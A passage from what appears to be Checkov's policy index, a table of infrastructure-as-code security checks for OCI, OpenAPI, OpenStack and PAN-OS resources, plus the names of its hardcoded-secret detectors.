CKV_OCI_10 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage is not Public | Terraform | [ObjectStoragePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStoragePublic.py) | +| 3790 | CKV_OCI_11 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain lower case | Terraform | 
[IAMPasswordPolicyLowerCase.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyLowerCase.py) | +| 3791 | CKV_OCI_12 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain Numeric characters | Terraform | [IAMPasswordPolicyNumeric.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyNumeric.py) | +| 3792 | CKV_OCI_13 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain Special characters | Terraform | [IAMPasswordPolicySpecialCharacters.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicySpecialCharacters.py) | +| 3793 | CKV_OCI_14 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain Uppercase characters | Terraform | [IAMPasswordPolicyUpperCase.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyUpperCase.py) | +| 3794 | CKV_OCI_15 | resource | oci_file_storage_file_system | Ensure OCI File System is Encrypted with a customer Managed Key | Terraform | [FileSystemEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/FileSystemEncryption.py) | +| 3795 | CKV_OCI_16 | resource | oci_core_security_list | Ensure VCN has an inbound security list | Terraform | [SecurityListIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListIngress.py) | +| 3796 | CKV_OCI_17 | resource | oci_core_security_list | Ensure VCN inbound security lists are stateless | Terraform | [SecurityListIngressStateless.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListIngressStateless.py) | +| 3797 | CKV_OCI_18 | resource | oci_identity_authentication_policy | OCI IAM password policy for local (non-federated) users has 
a minimum length of 14 characters | Terraform | [IAMPasswordLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordLength.py) | +| 3798 | CKV_OCI_19 | resource | oci_core_security_list | Ensure no security list allow ingress from 0.0.0.0:0 to port 22. | Terraform | [SecurityListUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListUnrestrictedIngress22.py) | +| 3799 | CKV_OCI_20 | resource | oci_core_security_list | Ensure no security list allow ingress from 0.0.0.0:0 to port 3389. | Terraform | [SecurityListUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListUnrestrictedIngress3389.py) | +| 3800 | CKV_OCI_21 | resource | oci_core_network_security_group_security_rule | Ensure security group has stateless ingress security rules | Terraform | [SecurityGroupsIngressStatelessSecurityRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityGroupsIngressStatelessSecurityRules.py) | +| 3801 | CKV_OCI_22 | resource | oci_core_network_security_group_security_rule | Ensure no security groups rules allow ingress from 0.0.0.0/0 to port 22 | Terraform | [AbsSecurityGroupUnrestrictedIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/AbsSecurityGroupUnrestrictedIngress.py) | +| 3802 | CKV2_OCI_1 | resource | oci_identity_group | Ensure administrator users are not associated with API keys | Terraform | [AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml) | +| 3803 | CKV2_OCI_1 | resource | oci_identity_user | Ensure administrator users are not associated with API keys | Terraform | 
[AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml) | +| 3804 | CKV2_OCI_1 | resource | oci_identity_user_group_membership | Ensure administrator users are not associated with API keys | Terraform | [AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml) | +| 3805 | CKV2_OCI_2 | resource | oci_core_network_security_group_security_rule | Ensure NSG does not allow all traffic on RDP port (3389) | Terraform | [OCI_NSGNotAllowRDP.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_NSGNotAllowRDP.yaml) | +| 3806 | CKV2_OCI_3 | resource | oci_containerengine_cluster | Ensure Kubernetes engine cluster is configured with NSG(s) | Terraform | [OCI_KubernetesEngineClusterEndpointConfigWithNSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_KubernetesEngineClusterEndpointConfigWithNSG.yaml) | +| 3807 | CKV2_OCI_4 | resource | oci_file_storage_export | Ensure File Storage File System access is restricted to root users | Terraform | [OCI_NFSaccessRestrictedToRootUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_NFSaccessRestrictedToRootUsers.yaml) | +| 3808 | CKV2_OCI_5 | resource | oci_containerengine_node_pool | Ensure Kubernetes Engine Cluster boot volume is configured with in-transit data encryption | Terraform | [OCI_K8EngineClusterBootVolConfigInTransitEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_K8EngineClusterBootVolConfigInTransitEncryption.yaml) | +| 3809 | CKV2_OCI_6 | resource | oci_containerengine_cluster | Ensure Kubernetes Engine Cluster pod security policy is enforced | 
Terraform | [OCI_K8EngineClusterPodSecPolicyEnforced.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_K8EngineClusterPodSecPolicyEnforced.yaml) | +| 3810 | CKV_OPENAPI_1 | resource | securityDefinitions | Ensure that securityDefinitions is defined and not empty - version 2.0 files | OpenAPI | [SecurityDefinitions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/SecurityDefinitions.py) | +| 3811 | CKV_OPENAPI_2 | resource | security | Ensure that if the security scheme is not of type 'oauth2', the array value must be empty - version 2.0 files | OpenAPI | [Oauth2SecurityRequirement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/Oauth2SecurityRequirement.py) | +| 3812 | CKV_OPENAPI_3 | resource | components | Ensure that security schemes don't allow cleartext credentials over unencrypted channel - version 3.x.y files | OpenAPI | [CleartextOverUnencryptedChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v3/CleartextOverUnencryptedChannel.py) | +| 3813 | CKV_OPENAPI_4 | resource | security | Ensure that the global security field has rules defined | OpenAPI | [GlobalSecurityFieldIsEmpty.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/generic/GlobalSecurityFieldIsEmpty.py) | +| 3814 | CKV_OPENAPI_5 | resource | security | Ensure that security operations is not empty. 
| OpenAPI | [SecurityOperations.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/generic/SecurityOperations.py) | +| 3815 | CKV_OPENAPI_6 | resource | security | Ensure that security requirement defined in securityDefinitions - version 2.0 files | OpenAPI | [SecurityRequirement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/SecurityRequirement.py) | +| 3816 | CKV_OPENAPI_7 | resource | security | Ensure that the path scheme does not support unencrypted HTTP connection where all transmissions are open to interception- version 2.0 files | OpenAPI | [PathSchemeDefineHTTP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/PathSchemeDefineHTTP.py) | +| 3817 | CKV_OPENAPI_8 | resource | security | Ensure that security is not using 'password' flow in OAuth2 authentication - version 2.0 files | OpenAPI | [Oauth2SecurityPasswordFlow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/Oauth2SecurityPasswordFlow.py) | +| 3818 | CKV_OPENAPI_9 | resource | paths | Ensure that security scopes of operations are defined in securityDefinitions - version 2.0 files | OpenAPI | [OperationObjectSecurityScopeUndefined.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/OperationObjectSecurityScopeUndefined.py) | +| 3819 | CKV_OPENAPI_10 | resource | paths | Ensure that operation object does not use 'password' flow in OAuth2 authentication - version 2.0 files | OpenAPI | [Oauth2OperationObjectPasswordFlow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/Oauth2OperationObjectPasswordFlow.py) | +| 3820 | CKV_OPENAPI_11 | resource | securityDefinitions | Ensure that operation object does not use 'password' flow in OAuth2 authentication - version 2.0 files | OpenAPI | 
[Oauth2SecurityDefinitionPasswordFlow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/Oauth2SecurityDefinitionPasswordFlow.py) | +| 3821 | CKV_OPENAPI_12 | resource | securityDefinitions | Ensure no security definition is using implicit flow on OAuth2, which is deprecated - version 2.0 files | OpenAPI | [Oauth2SecurityDefinitionImplicitFlow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/Oauth2SecurityDefinitionImplicitFlow.py) | +| 3822 | CKV_OPENAPI_13 | resource | securityDefinitions | Ensure security definitions do not use basic auth - version 2.0 files | OpenAPI | [SecurityDefinitionBasicAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/SecurityDefinitionBasicAuth.py) | +| 3823 | CKV_OPENAPI_14 | resource | paths | Ensure that operation objects do not use 'implicit' flow, which is deprecated - version 2.0 files | OpenAPI | [OperationObjectImplicitFlow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/OperationObjectImplicitFlow.py) | +| 3824 | CKV_OPENAPI_15 | resource | paths | Ensure that operation objects do not use basic auth - version 2.0 files | OpenAPI | [OperationObjectBasicAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/OperationObjectBasicAuth.py) | +| 3825 | CKV_OPENAPI_16 | resource | paths | Ensure that operation objects have 'produces' field defined for GET operations - version 2.0 files | OpenAPI | [OperationObjectProducesUndefined.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/OperationObjectProducesUndefined.py) | +| 3826 | CKV_OPENAPI_17 | resource | paths | Ensure that operation objects have 'consumes' field defined for PUT, POST and PATCH operations - version 2.0 files | OpenAPI | 
[OperationObjectConsumesUndefined.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/OperationObjectConsumesUndefined.py) | +| 3827 | CKV_OPENAPI_18 | resource | schemes | Ensure that global schemes use 'https' protocol instead of 'http'- version 2.0 files | OpenAPI | [GlobalSchemeDefineHTTP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/GlobalSchemeDefineHTTP.py) | +| 3828 | CKV_OPENAPI_19 | resource | security | Ensure that global security scope is defined in securityDefinitions - version 2.0 files | OpenAPI | [GlobalSecurityScopeUndefined.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/GlobalSecurityScopeUndefined.py) | +| 3829 | CKV_OPENAPI_20 | resource | paths | Ensure that API keys are not sent over cleartext | OpenAPI | [ClearTextAPIKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/generic/ClearTextAPIKey.py) | +| 3830 | CKV_OPENAPI_21 | resource | paths | Ensure that arrays have a maximum number of items | OpenAPI | [NoMaximumNumberItems.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/generic/NoMaximumNumberItems.py) | +| 3831 | CKV_OPENSTACK_1 | provider | openstack | Ensure no hard coded OpenStack password, token, or application_credential_secret exists in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/openstack/credentials.py) | +| 3832 | CKV_OPENSTACK_2 | resource | openstack_compute_secgroup_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress22.py) | +| 3833 | CKV_OPENSTACK_2 | resource | openstack_networking_secgroup_rule_v2 | Ensure no security groups allow ingress from 
0.0.0.0:0 to port 22 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress22.py) | +| 3834 | CKV_OPENSTACK_3 | resource | openstack_compute_secgroup_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress3389.py) | +| 3835 | CKV_OPENSTACK_3 | resource | openstack_networking_secgroup_rule_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress3389.py) | +| 3836 | CKV_OPENSTACK_4 | resource | openstack_compute_instance_v2 | Ensure that instance does not use basic credentials | Terraform | [ComputeInstanceAdminPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/ComputeInstanceAdminPassword.py) | +| 3837 | CKV_OPENSTACK_5 | resource | openstack_fw_rule_v1 | Ensure firewall rule set a destination IP | Terraform | [FirewallRuleSetDestinationIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/FirewallRuleSetDestinationIP.py) | +| 3838 | CKV_PAN_1 | provider | panos | Ensure no hard coded PAN-OS credentials exist in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/panos/credentials.py) | +| 3839 | CKV_PAN_2 | resource | panos_management_profile | Ensure plain-text management HTTP is not enabled for an Interface Management Profile | Terraform | 
[InterfaceMgmtProfileNoHTTP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/InterfaceMgmtProfileNoHTTP.py) | +| 3840 | CKV_PAN_2 | resource | tasks.paloaltonetworks.panos.panos_management_profile | Ensure plain-text management HTTP is not enabled for an Interface Management Profile | Ansible | [PanosInterfaceMgmtProfileNoHTTP.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosInterfaceMgmtProfileNoHTTP.yaml) | +| 3841 | CKV_PAN_3 | resource | panos_management_profile | Ensure plain-text management Telnet is not enabled for an Interface Management Profile | Terraform | [InterfaceMgmtProfileNoTelnet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/InterfaceMgmtProfileNoTelnet.py) | +| 3842 | CKV_PAN_3 | resource | tasks.paloaltonetworks.panos.panos_management_profile | Ensure plain-text management Telnet is not enabled for an Interface Management Profile | Ansible | [PanosInterfaceMgmtProfileNoTelnet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosInterfaceMgmtProfileNoTelnet.yaml) | +| 3843 | CKV_PAN_4 | resource | panos_security_policy | Ensure DSRI is not enabled within security policies | Terraform | [PolicyNoDSRI.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoDSRI.py) | +| 3844 | CKV_PAN_4 | resource | panos_security_rule_group | Ensure DSRI is not enabled within security policies | Terraform | [PolicyNoDSRI.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoDSRI.py) | +| 3845 | CKV_PAN_4 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure DSRI is not enabled within security policies | Ansible | [PanosPolicyNoDSRI.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyNoDSRI.yaml) | +| 3846 | CKV_PAN_5 | 
resource | panos_security_policy | Ensure security rules do not have 'applications' set to 'any' | Terraform | [PolicyNoApplicationAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoApplicationAny.py) | +| 3847 | CKV_PAN_5 | resource | panos_security_rule_group | Ensure security rules do not have 'applications' set to 'any' | Terraform | [PolicyNoApplicationAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoApplicationAny.py) | +| 3848 | CKV_PAN_5 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure security rules do not have 'application' set to 'any' | Ansible | [PanosPolicyNoApplicationAny.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyNoApplicationAny.yaml) | +| 3849 | CKV_PAN_6 | resource | panos_security_policy | Ensure security rules do not have 'services' set to 'any' | Terraform | [PolicyNoServiceAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoServiceAny.py) | +| 3850 | CKV_PAN_6 | resource | panos_security_rule_group | Ensure security rules do not have 'services' set to 'any' | Terraform | [PolicyNoServiceAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoServiceAny.py) | +| 3851 | CKV_PAN_6 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure security rules do not have 'service' set to 'any' | Ansible | [PanosPolicyNoServiceAny.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyNoServiceAny.yaml) | +| 3852 | CKV_PAN_7 | resource | panos_security_policy | Ensure security rules do not have 'source_addresses' and 'destination_addresses' both containing values of 'any' | Terraform | 
[PolicyNoSrcAnyDstAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoSrcAnyDstAny.py) | +| 3853 | CKV_PAN_7 | resource | panos_security_rule_group | Ensure security rules do not have 'source_addresses' and 'destination_addresses' both containing values of 'any' | Terraform | [PolicyNoSrcAnyDstAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoSrcAnyDstAny.py) | +| 3854 | CKV_PAN_7 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure security rules do not have 'source_ip' and 'destination_ip' both containing values of 'any' | Ansible | [PanosPolicyNoSrcAnyDstAny.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyNoSrcAnyDstAny.yaml) | +| 3855 | CKV_PAN_8 | resource | panos_security_policy | Ensure description is populated within security policies | Terraform | [PolicyDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyDescription.py) | +| 3856 | CKV_PAN_8 | resource | panos_security_rule_group | Ensure description is populated within security policies | Terraform | [PolicyDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyDescription.py) | +| 3857 | CKV_PAN_8 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure description is populated within security policies | Ansible | [PanosPolicyDescription.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyDescription.yaml) | +| 3858 | CKV_PAN_9 | resource | panos_security_policy | Ensure a Log Forwarding Profile is selected for each security policy rule | Terraform | [PolicyLogForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLogForwarding.py) | +| 3859 | CKV_PAN_9 | resource | 
panos_security_rule_group | Ensure a Log Forwarding Profile is selected for each security policy rule | Terraform | [PolicyLogForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLogForwarding.py) | +| 3860 | CKV_PAN_9 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure a Log Forwarding Profile is selected for each security policy rule | Ansible | [PanosPolicyLogForwarding.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyLogForwarding.yaml) | +| 3861 | CKV_PAN_10 | resource | panos_security_policy | Ensure logging at session end is enabled within security policies | Terraform | [PolicyLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLoggingEnabled.py) | +| 3862 | CKV_PAN_10 | resource | panos_security_rule_group | Ensure logging at session end is enabled within security policies | Terraform | [PolicyLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLoggingEnabled.py) | +| 3863 | CKV_PAN_10 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure logging at session end is enabled within security policies | Ansible | [PanosPolicyLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyLoggingEnabled.yaml) | +| 3864 | CKV_PAN_11 | resource | panos_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure encryption algorithms | Terraform | [NetworkIPsecAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAlgorithms.py) | +| 3865 | CKV_PAN_11 | resource | panos_panorama_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure encryption algorithms | Terraform | 
[NetworkIPsecAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAlgorithms.py) | +| 3866 | CKV_PAN_12 | resource | panos_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure authentication algorithms | Terraform | [NetworkIPsecAuthAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAuthAlgorithms.py) | +| 3867 | CKV_PAN_12 | resource | panos_panorama_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure authentication algorithms | Terraform | [NetworkIPsecAuthAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAuthAlgorithms.py) | +| 3868 | CKV_PAN_12 | resource | tasks.paloaltonetworks.panos.panos_ipsec_profile | Ensure IPsec profiles do not specify use of insecure authentication algorithms | Ansible | [PanosIPsecAuthenticationAlgorithms.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosIPsecAuthenticationAlgorithms.yaml) | +| 3869 | CKV_PAN_13 | resource | panos_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure protocols | Terraform | [NetworkIPsecProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecProtocols.py) | +| 3870 | CKV_PAN_13 | resource | panos_panorama_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure protocols | Terraform | [NetworkIPsecProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecProtocols.py) | +| 3871 | CKV_PAN_13 | resource | tasks.paloaltonetworks.panos.panos_ipsec_profile | Ensure IPsec profiles do not specify use of insecure protocols | Ansible | 
[PanosIPsecProtocols.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosIPsecProtocols.yaml) | +| 3872 | CKV_PAN_14 | resource | panos_panorama_zone | Ensure a Zone Protection Profile is defined within Security Zones | Terraform | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py) | +| 3873 | CKV_PAN_14 | resource | panos_zone | Ensure a Zone Protection Profile is defined within Security Zones | Terraform | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py) | +| 3874 | CKV_PAN_14 | resource | panos_zone_entry | Ensure a Zone Protection Profile is defined within Security Zones | Terraform | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py) | +| 3875 | CKV_PAN_14 | resource | tasks.paloaltonetworks.panos.panos_zone | Ensure a Zone Protection Profile is defined within Security Zones | Ansible | [PanosZoneProtectionProfile.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosZoneProtectionProfile.yaml) | +| 3876 | CKV_PAN_15 | resource | panos_panorama_zone | Ensure an Include ACL is defined for a Zone when User-ID is enabled | Terraform | [ZoneUserIDIncludeACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneUserIDIncludeACL.py) | +| 3877 | CKV_PAN_15 | resource | panos_zone | Ensure an Include ACL is defined for a Zone when User-ID is enabled | Terraform | [ZoneUserIDIncludeACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneUserIDIncludeACL.py) | +| 3878 | CKV_PAN_15 | resource | tasks.paloaltonetworks.panos.panos_zone | Ensure an Include ACL is defined for a Zone when User-ID is enabled | Ansible | 
[PanosZoneUserIDIncludeACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosZoneUserIDIncludeACL.yaml) | +| 3879 | CKV_PAN_16 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure logging at session start is disabled within security policies except for troubleshooting and long lived GRE tunnels | Ansible | [PanosPolicyLogSessionStart.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyLogSessionStart.yaml) | +| 3880 | CKV_PAN_17 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure security rules do not have 'source_zone' and 'destination_zone' both containing values of 'any' | Ansible | [PanosPolicyNoSrcZoneAnyNoDstZoneAny.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyNoSrcZoneAnyNoDstZoneAny.yaml) | +| 3881 | CKV_SECRET_1 | Artifactory Credentials | secrets | Artifactory Credentials | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3882 | CKV_SECRET_2 | AWS Access Key | secrets | AWS Access Key | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3883 | CKV_SECRET_3 | Azure Storage Account access key | secrets | Azure Storage Account access key | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3884 | CKV_SECRET_4 | Basic Auth Credentials | secrets | Basic Auth Credentials | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3885 | 
CKV_SECRET_5 | Cloudant Credentials | secrets | Cloudant Credentials | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3886 | CKV_SECRET_6 | Base64 High Entropy String | secrets | Base64 High Entropy String | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3887 | CKV_SECRET_7 | IBM Cloud IAM Key | secrets | IBM Cloud IAM Key | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3888 | CKV_SECRET_8 | IBM COS HMAC Credentials | secrets | IBM COS HMAC Credentials | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3889 | CKV_SECRET_9 | JSON Web Token | secrets | JSON Web Token | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3890 | CKV_SECRET_11 | Mailchimp Access Key | secrets | Mailchimp Access Key | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3891 | CKV_SECRET_12 | NPM tokens | secrets | NPM tokens | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3892 | CKV_SECRET_13 | Private Key | secrets | Private Key | secrets | 
